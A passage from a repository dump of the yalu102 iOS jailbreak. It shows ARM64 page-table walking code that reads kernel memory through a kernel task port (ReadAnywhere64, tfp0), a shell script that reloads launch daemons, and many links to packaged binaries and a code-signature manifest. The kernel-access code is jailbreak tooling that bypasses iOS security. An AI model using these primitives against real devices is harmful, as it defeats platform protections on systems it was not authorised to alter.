TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 18 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 19 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 20 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 21 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 22 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 23 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 24 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 25 | #define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase) 26 | #define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase) 27 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 28 | 29 | typedef union VMA_4K { 30 | struct { 31 | uint64_t block_off : 12; 32 | uint64_t level3_index : 9; 33 | uint64_t level2_index : 9; 34 | uint64_t level1_index : 9; 35 | uint64_t level0_index : 9; 36 | uint64_t ttbr_selector : 16; 37 | } __attribute__((packed)) vm_info; 38 | uint64_t vmaddr; 39 | } VMA_4K; 40 | typedef union VMA_16K { 41 | struct { 42 | uint64_t block_off : 14; 43 | uint64_t level3_index : 11; 44 | uint64_t level2_index : 11; 45 | uint64_t level1_index : 11; 46 | uint64_t level0_index : 1; 47 | uint64_t ttbr_selector : 16; 48 | } __attribute__((packed)) vm_info; 49 | uint64_t vmaddr; 50 | } VMA_16K; 51 | 52 | VMA_16K vad16; 53 | VMA_4K vad4; 54 | char isvad = 0; 55 | 56 | #define TTELog NSLog 57 | vm_size_t sz = 0; 58 | 59 | void checkvad() { 60 | if (!sz) { 61 | host_page_size(mach_host_self(), &sz); 62 | assert(sz); 63 | if (sz == 4096) { 64 | isvad = 1; 65 | } 66 | } 67 | } 68 | void parse_block_tte(uint64_t tte) { 69 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 70 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 71 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 72 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 73 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 74 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 75 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 76 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 77 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 78 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 79 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 80 | } 81 | 82 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 83 | 84 | checkvad(); 85 | if (!table) table = level1_table; 86 | if (!level) level = 1; 87 | 88 | vm_address_t tteaddr = 0; 89 | 90 | 91 | 92 | if (sz == 4096) { 93 | VMA_4K target_addr; 94 | target_addr.vmaddr = vmaddr; 95 | 96 | if (level == 1) { 97 | target_addr.vm_info.level1_index -= 0x1c0; 98 | } 99 | 100 | switch (level) { 101 | case 0: 102 | tteaddr = table + TTE_INDEX(target_addr, level0); 103 | break; 104 | case 1: 105 | tteaddr = table + TTE_INDEX(target_addr, level1); 106 | break; 107 | 108 | case 2: 109 | tteaddr = table + TTE_INDEX(target_addr, level2); 110 | break; 111 | 112 | case 3: 113 | tteaddr = table + TTE_INDEX(target_addr, level3); 114 | break; 115 | 116 | default: 117 | break; 118 | } 119 | 120 | } else if (sz == 4096*4) { 121 | VMA_16K target_addr; 122 | target_addr.vmaddr = vmaddr; 123 | 124 | switch (level) { 125 | case 0: 126 | tteaddr = table + TTE_INDEX(target_addr, level0); 127 | break; 128 | case 1: 129 | tteaddr = table + TTE_INDEX(target_addr, level1); 130 | break; 131 | 132 | case 2: 133 | tteaddr = table + TTE_INDEX(target_addr, level2); 134 | break; 135 | 136 | case 3: 137 | tteaddr = table + TTE_INDEX(target_addr, level3); 138 | break; 139 | 140 | default: 141 | break; 142 | } 143 | 144 | 145 | } 146 | 147 | //parse_block_tte(level1_entry); 148 | 149 | pagestuff_64_callback(tteaddr, level); 150 | 151 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 152 | 153 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 154 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 155 | } 156 | } 157 | 158 | uint64_t findphys_real(uint64_t virtaddr) { 159 | __block uint64_t physvar = 0; 160 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) { 161 | uint64_t tte = ReadAnywhere64(tte_addr); 162 | if (addr == 3) {\ 163 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 164 | } 165 | }, level1_table, isvad ? 1 : 2); 166 | 167 | return physvar; 168 | 169 | } 170 | uint64_t physalloc(uint64_t size) { 171 | uint64_t ret = 0; 172 | mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE); 173 | return ret; 174 | } 175 | 176 | #endif 177 | -------------------------------------------------------------------------------- /SourceCode/yalu102/reload: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ls /etc/rc.d | while read a; do /etc/rc.d/$a; done 3 | sleep 1 4 | launchctl unload /System/Library/LaunchDaemons 5 | launchctl load /System/Library/LaunchDaemons/com.apple.logd.plist 6 | sleep 1 7 | launchctl load /Library/LaunchDaemons 8 | launchctl load /System/Library/LaunchDaemons 9 | 10 | exit 0 11 | -------------------------------------------------------------------------------- /SourceCode/yalu102/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/tar -------------------------------------------------------------------------------- /yalu102.app/0.reload.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/0.reload.plist -------------------------------------------------------------------------------- /yalu102.app/AppIcon20x20@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon20x20@2x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon20x20@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon20x20@2x~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon20x20@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon20x20@3x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon20x20~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon20x20~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon29x29@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon29x29@2x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon29x29@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon29x29@2x~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon29x29@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon29x29@3x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon29x29~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon29x29~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon40x40@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon40x40@2x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon40x40@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon40x40@2x~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon40x40@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon40x40@3x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon40x40~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon40x40~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon76x76@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon76x76@2x~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon76x76~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon76x76~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon83.5x83.5@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon83.5x83.5@2x~ipad.png -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/LaunchScreen.storyboardc/01J-lp-oVM-view-Ze5-6b-2t3.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/LaunchScreen.storyboardc/01J-lp-oVM-view-Ze5-6b-2t3.nib -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/LaunchScreen.storyboardc/Info.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/LaunchScreen.storyboardc/Info.plist -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/LaunchScreen.storyboardc/UIViewController-01J-lp-oVM.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/LaunchScreen.storyboardc/UIViewController-01J-lp-oVM.nib -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/Main.storyboardc/BYZ-38-t0r-view-8bC-Xf-vdC.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/Main.storyboardc/BYZ-38-t0r-view-8bC-Xf-vdC.nib -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/Main.storyboardc/Info.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/Main.storyboardc/Info.plist -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/Main.storyboardc/UIViewController-BYZ-38-t0r.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/Main.storyboardc/UIViewController-BYZ-38-t0r.nib -------------------------------------------------------------------------------- /yalu102.app/Info.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Info.plist -------------------------------------------------------------------------------- /yalu102.app/PkgInfo: -------------------------------------------------------------------------------- 1 | APPL???? -------------------------------------------------------------------------------- /yalu102.app/_CodeSignature/CodeResources: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | files 6 | 7 | 0.reload.plist 8 | 9 | 5Kjw0hWFiOO6z/ghqWvRpKceJQE= 10 | 11 | AppIcon20x20@2x.png 12 | 13 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 14 | 15 | AppIcon20x20@2x~ipad.png 16 | 17 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 18 | 19 | AppIcon20x20@3x.png 20 | 21 | UNKQp+EJbgXN3kRFhJ9R3J8Wd5s= 22 | 23 | AppIcon20x20~ipad.png 24 | 25 | oF4h0Y9EePmb+n214Y09P/kVRG4= 26 | 27 | AppIcon29x29@2x.png 28 | 29 | FRAndYihYJC4Xu+faGeZ5hrdM+0= 30 | 31 | AppIcon29x29@2x~ipad.png 32 | 33 | FRAndYihYJC4Xu+faGeZ5hrdM+0= 34 | 35 | AppIcon29x29@3x.png 36 | 37 | bBxF5tAupkF9UFhZXkkZxvXA5CA= 38 | 39 | AppIcon29x29~ipad.png 40 | 41 | UCeWvzZq7D21yhKWDue/WmKu140= 42 | 43 | AppIcon40x40@2x.png 44 | 45 | X2dtzMsq1sNco4V1hZk98O5jhm0= 46 | 47 | AppIcon40x40@2x~ipad.png 48 | 49 | X2dtzMsq1sNco4V1hZk98O5jhm0= 50 | 51 | AppIcon40x40@3x.png 52 | 53 | 167wTBmLmdzpd16bsMTCvdy0uB8= 54 | 55 | AppIcon40x40~ipad.png 56 | 57 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 58 | 59 | AppIcon60x60@2x.png 60 | 61 | LCr5vcv7EBgA5ujfGKXIDda2NNA= 62 | 63 | AppIcon60x60@3x.png 64 | 65 | XcK0gZgNnsETXQJ+BegwTp13Bfo= 66 | 67 | AppIcon76x76@2x~ipad.png 68 | 69 | 4SQeBURGDhY9V4nWFVI13EoTZKM= 70 | 71 | AppIcon76x76~ipad.png 72 | 73 | zQnouJFAEd9zfvgWbxN5+2lSmXY= 74 | 75 | AppIcon83.5x83.5@2x~ipad.png 76 | 77 | HOfyprdtHh/3nNKszpl8LfiSLqc= 78 | 79 | Base.lproj/LaunchScreen.storyboardc/01J-lp-oVM-view-Ze5-6b-2t3.nib 80 | 81 | hash 82 | 83 | W6YTg2qMCXj+M1t5ZkSwpyzmn1Q= 84 | 85 | optional 86 | 87 | 88 | Base.lproj/LaunchScreen.storyboardc/Info.plist 89 | 90 | hash 91 | 92 | n2t8gsDpfE6XkhG31p7IQJRxTxU= 93 | 94 | optional 95 | 96 | 97 | Base.lproj/LaunchScreen.storyboardc/UIViewController-01J-lp-oVM.nib 98 | 99 | hash 100 | 101 | iYiz1Wnz7G0ByiaEarkZjw5pZ50= 102 | 103 | optional 104 | 105 | 106 | Base.lproj/Main.storyboardc/BYZ-38-t0r-view-8bC-Xf-vdC.nib 107 | 108 | hash 109 | 110 | dCTco81HlI53icsxkmpY4ma7uiE= 111 | 112 | optional 113 | 114 | 115 | Base.lproj/Main.storyboardc/Info.plist 116 | 117 | hash 118 | 119 | MDrKFvFWroTb0+KEbQShBcoBvo4= 120 | 121 | optional 122 | 123 | 124 | Base.lproj/Main.storyboardc/UIViewController-BYZ-38-t0r.nib 125 | 126 | hash 127 | 128 | MYNbw9VpODUPJW83AGF5PRM4cH0= 129 | 130 | optional 131 | 132 | 133 | Info.plist 134 | 135 | ly+BPUNSE/9/mZSBS8wko4XImqo= 136 | 137 | PkgInfo 138 | 139 | n57qDP4tZfLD1rCS43W0B4LQjzE= 140 | 141 | bootstrap.tar 142 | 143 | M3F+Y2xXX53vUfHzcej+W4/JCzc= 144 | 145 | embedded.mobileprovision 146 | 147 | pQnMEgsSdbaNcrzCD399Rd8EtrM= 148 | 149 | launchctl 150 | 151 | QvbrRKZyHftjDQ5QhNnC8Y0aTag= 152 | 153 | reload 154 | 155 | nnTE9lXtABwAybaHACL97ObkK68= 156 | 157 | tar 158 | 159 | xReGJgbRaSU/njYXXhu6JZ7kk1s= 160 | 161 | 162 | files2 163 | 164 | 0.reload.plist 165 | 166 | hash 167 | 168 | 5Kjw0hWFiOO6z/ghqWvRpKceJQE= 169 | 170 | hash2 171 | 172 | +LOdR96/KX1Fb8fbgJcICidCq1QHyc9zcIumuhsV4C0= 173 | 174 | 175 | AppIcon20x20@2x.png 176 | 177 | hash 178 | 179 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 180 | 181 | hash2 182 | 183 | DScN830fscFtzRNBKWOnCDAYn0EaRXATh5RFSmf1ys0= 184 | 185 | 186 | AppIcon20x20@2x~ipad.png 187 | 188 | hash 189 | 190 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 191 | 192 | hash2 193 | 194 | DScN830fscFtzRNBKWOnCDAYn0EaRXATh5RFSmf1ys0= 195 | 196 | 197 | AppIcon20x20@3x.png 198 | 199 | hash 200 | 201 | UNKQp+EJbgXN3kRFhJ9R3J8Wd5s= 202 | 203 | hash2 204 | 205 | tGp1Tlnvxq49fwM8izZzsOXXnweaG2STFgCZo03Tpqw= 206 | 207 | 208 | AppIcon20x20~ipad.png 209 | 210 | hash 211 | 212 | oF4h0Y9EePmb+n214Y09P/kVRG4= 213 | 214 | hash2 215 | 216 | R5rsIwg6Y//uqwHVDs+/ftM3beWKpTYr3UWuu5ooHps= 217 | 218 | 219 | AppIcon29x29@2x.png 220 | 221 | hash 222 | 223 | FRAndYihYJC4Xu+faGeZ5hrdM+0= 224 | 225 | hash2 226 | 227 | gYLKwYd1bEAv463MaZMDkeiJcC0Tx35vN/ddba8+lik= 228 | 229 | 230 | AppIcon29x29@2x~ipad.png 231 | 232 | hash 233 | 234 | FRAndYihYJC4Xu+faGeZ5hrdM+0= 235 | 236 | hash2 237 | 238 | gYLKwYd1bEAv463MaZMDkeiJcC0Tx35vN/ddba8+lik= 239 | 240 | 241 | AppIcon29x29@3x.png 242 | 243 | hash 244 | 245 | bBxF5tAupkF9UFhZXkkZxvXA5CA= 246 | 247 | hash2 248 | 249 | BgQ5IkdsPdEicwxUsqVxfIYk37xpL7nqYvW/59JEIy4= 250 | 251 | 252 | AppIcon29x29~ipad.png 253 | 254 | hash 255 | 256 | UCeWvzZq7D21yhKWDue/WmKu140= 257 | 258 | hash2 259 | 260 | DYvg99izL8Pua6xlGXUk08e12rUltsYxhM2dSWUPT9s= 261 | 262 | 263 | AppIcon40x40@2x.png 264 | 265 | hash 266 | 267 | X2dtzMsq1sNco4V1hZk98O5jhm0= 268 | 269 | hash2 270 | 271 | l5rwZlX8hwo4qtOvU4l5z7o9K2bakstI80u8ntoJ+yI= 272 | 273 | 274 | AppIcon40x40@2x~ipad.png 275 | 276 | hash 277 | 278 | X2dtzMsq1sNco4V1hZk98O5jhm0= 279 | 280 | hash2 281 | 282 | l5rwZlX8hwo4qtOvU4l5z7o9K2bakstI80u8ntoJ+yI= 283 | 284 | 285 | AppIcon40x40@3x.png 286 | 287 | hash 288 | 289 | 167wTBmLmdzpd16bsMTCvdy0uB8= 290 | 291 | hash2 292 | 293 | a1Ksq7CLQF0vRMlgrf2mBWsQwgL852NMQ4XdTS9gX9M= 294 | 295 | 296 | AppIcon40x40~ipad.png 297 | 298 | hash 299 | 300 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 301 | 302 | hash2 303 | 304 | DScN830fscFtzRNBKWOnCDAYn0EaRXATh5RFSmf1ys0= 305 | 306 | 307 | AppIcon60x60@2x.png 308 | 309 | hash 310 | 311 | LCr5vcv7EBgA5ujfGKXIDda2NNA= 312 | 313 | hash2 314 | 315 | hXoyNrM3U1SrwgStlMyvMye9oWIMvCOaYLeYuvOUqs4= 316 | 317 | 318 | AppIcon60x60@3x.png 319 | 320 | hash 321 | 322 | XcK0gZgNnsETXQJ+BegwTp13Bfo= 323 | 324 | hash2 325 | 326 | U6QBObAB3bXz4qilDofr9BH+rHbw2BJCxompqGz7g60= 327 | 328 | 329 | AppIcon76x76@2x~ipad.png 330 | 331 | hash 332 | 333 | 4SQeBURGDhY9V4nWFVI13EoTZKM= 334 | 335 | hash2 336 | 337 | gWUgNn8Z+fNNK0Zz+axSb661YJrlfAv5vzOJ6eIrUyc= 338 | 339 | 340 | AppIcon76x76~ipad.png 341 | 342 | hash 343 | 344 | zQnouJFAEd9zfvgWbxN5+2lSmXY= 345 | 346 | hash2 347 | 348 | LRsDG3wp4UjCQW9tiqkso6YKBrYNL01IM0dySqLsZh8= 349 | 350 | 351 | AppIcon83.5x83.5@2x~ipad.png 352 | 353 | hash 354 | 355 | HOfyprdtHh/3nNKszpl8LfiSLqc= 356 | 357 | hash2 358 | 359 | pPWzhkSFf4xe6brC09Cyz+ZbP6XjbL8ioAfQ/bcdVFs= 360 | 361 | 362 | Base.lproj/LaunchScreen.storyboardc/01J-lp-oVM-view-Ze5-6b-2t3.nib 363 | 364 | hash 365 | 366 | W6YTg2qMCXj+M1t5ZkSwpyzmn1Q= 367 | 368 | hash2 369 | 370 | YQY25BavFTSz0guCja3ckZzjgaeth16m3bNAJvZvgK4= 371 | 372 | optional 373 | 374 | 375 | Base.lproj/LaunchScreen.storyboardc/Info.plist 376 | 377 | hash 378 | 379 | n2t8gsDpfE6XkhG31p7IQJRxTxU= 380 | 381 | hash2 382 | 383 | HyVdXMU7Ux4/KalAao30mpWOK/lEPT4gvYN09wf31cg= 384 | 385 | optional 386 | 387 | 388 | Base.lproj/LaunchScreen.storyboardc/UIViewController-01J-lp-oVM.nib 389 | 390 | hash 391 | 392 | iYiz1Wnz7G0ByiaEarkZjw5pZ50= 393 | 394 | hash2 395 | 396 | m3MrtalB7Dj1NNHX9rv5ollHEgMVO5HZ2wnmQN99DYY= 397 | 398 | optional 399 | 400 | 401 | Base.lproj/Main.storyboardc/BYZ-38-t0r-view-8bC-Xf-vdC.nib 402 | 403 | hash 404 | 405 | dCTco81HlI53icsxkmpY4ma7uiE= 406 | 407 | hash2 408 | 409 | 9BNggQ7gY/UBxfzUTGhUvtbIIW9z/l+DxWuPz7NdCm8= 410 | 411 | optional 412 | 413 | 414 | Base.lproj/Main.storyboardc/Info.plist 415 | 416 | hash 417 | 418 | MDrKFvFWroTb0+KEbQShBcoBvo4= 419 | 420 | hash2 421 | 422 | PpvapAjR62rl6Ym4E6hkTgpKmBICxTaQXeUqcpHmmqQ= 423 | 424 | optional 425 | 426 | 427 | Base.lproj/Main.storyboardc/UIViewController-BYZ-38-t0r.nib 428 | 429 | hash 430 | 431 | MYNbw9VpODUPJW83AGF5PRM4cH0= 432 | 433 | hash2 434 | 435 | pRboj/M++wT6Q0BHstWKBN1Wb/y4Ll7MTFp25iqxQtE= 436 | 437 | optional 438 | 439 | 440 | bootstrap.tar 441 | 442 | hash 443 | 444 | M3F+Y2xXX53vUfHzcej+W4/JCzc= 445 | 446 | hash2 447 | 448 | F9nSjjlNosvA4GDvxwFWz7QQioKaXsROC8rtcIfX0bM= 449 | 450 | 451 | embedded.mobileprovision 452 | 453 | hash 454 | 455 | pQnMEgsSdbaNcrzCD399Rd8EtrM= 456 | 457 | hash2 458 | 459 | ZXZ7pKGNna8ZDaaY/b2+gUzLRrj9F1MEPSHQj2971/c= 460 | 461 | 462 | launchctl 463 | 464 | hash 465 | 466 | QvbrRKZyHftjDQ5QhNnC8Y0aTag= 467 | 468 | hash2 469 | 470 | jWDWROAa31bpZY7aYd/7GwdHxmPi6EMDjo5+0mzMLp0= 471 | 472 | 473 | reload 474 | 475 | hash 476 | 477 | nnTE9lXtABwAybaHACL97ObkK68= 478 | 479 | hash2 480 | 481 | UcqbxNvvoCWPrOIlKKICZLHLcbIvyl3VfZ4lnDAvXsY= 482 | 483 | 484 | tar 485 | 486 | hash 487 | 488 | xReGJgbRaSU/njYXXhu6JZ7kk1s= 489 | 490 | hash2 491 | 492 | /oMM16aBLvxAHzsOglPSnnWdDJOng/sEo7rGZDUmH88= 493 | 494 | 495 | 496 | rules 497 | 498 | ^ 499 | 500 | ^.*\.lproj/ 501 | 502 | optional 503 | 504 | weight 505 | 1000 506 | 507 | ^.*\.lproj/locversion.plist$ 508 | 509 | omit 510 | 511 | weight 512 | 1100 513 | 514 | ^version.plist$ 515 | 516 | 517 | rules2 518 | 519 | .*\.dSYM($|/) 520 | 521 | weight 522 | 11 523 | 524 | ^ 525 | 526 | weight 527 | 20 528 | 529 | ^(.*/)?\.DS_Store$ 530 | 531 | omit 532 | 533 | weight 534 | 2000 535 | 536 | ^(Frameworks|SharedFrameworks|PlugIns|Plug-ins|XPCServices|Helpers|MacOS|Library/(Automator|Spotlight|LoginItems))/ 537 | 538 | nested 539 | 540 | weight 541 | 10 542 | 543 | ^.* 544 | 545 | ^.*\.lproj/ 546 | 547 | optional 548 | 549 | weight 550 | 1000 551 | 552 | ^.*\.lproj/locversion.plist$ 553 | 554 | omit 555 | 556 | weight 557 | 1100 558 | 559 | ^Info\.plist$ 560 | 561 | omit 562 | 563 | weight 564 | 20 565 | 566 | ^PkgInfo$ 567 | 568 | omit 569 | 570 | weight 571 | 20 572 | 573 | ^[^/]+$ 574 | 575 | nested 576 | 577 | weight 578 | 10 579 | 580 | ^embedded\.provisionprofile$ 581 | 582 | weight 583 | 20 584 | 585 | ^version\.plist$ 586 | 587 | weight 588 | 20 589 | 590 | 591 | 592 | 593 | -------------------------------------------------------------------------------- /yalu102.app/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/bootstrap.tar -------------------------------------------------------------------------------- /yalu102.app/embedded.mobileprovision: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/embedded.mobileprovision -------------------------------------------------------------------------------- /yalu102.app/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/launchctl -------------------------------------------------------------------------------- /yalu102.app/reload: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ls /etc/rc.d | while read a; do /etc/rc.d/$a; done 3 | sleep 1 4 | launchctl unload /System/Library/LaunchDaemons 5 | launchctl load /System/Library/LaunchDaemons/com.apple.logd.plist 6 | sleep 1 7 | launchctl load /Library/LaunchDaemons 8 | launchctl load /System/Library/LaunchDaemons 9 | 10 | exit 0 11 | -------------------------------------------------------------------------------- /yalu102.app/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/tar -------------------------------------------------------------------------------- /yalu102.app/yalu102: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/yalu102 -------------------------------------------------------------------------------- /yalu102.ipa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.ipa --------------------------------------------------------------------------------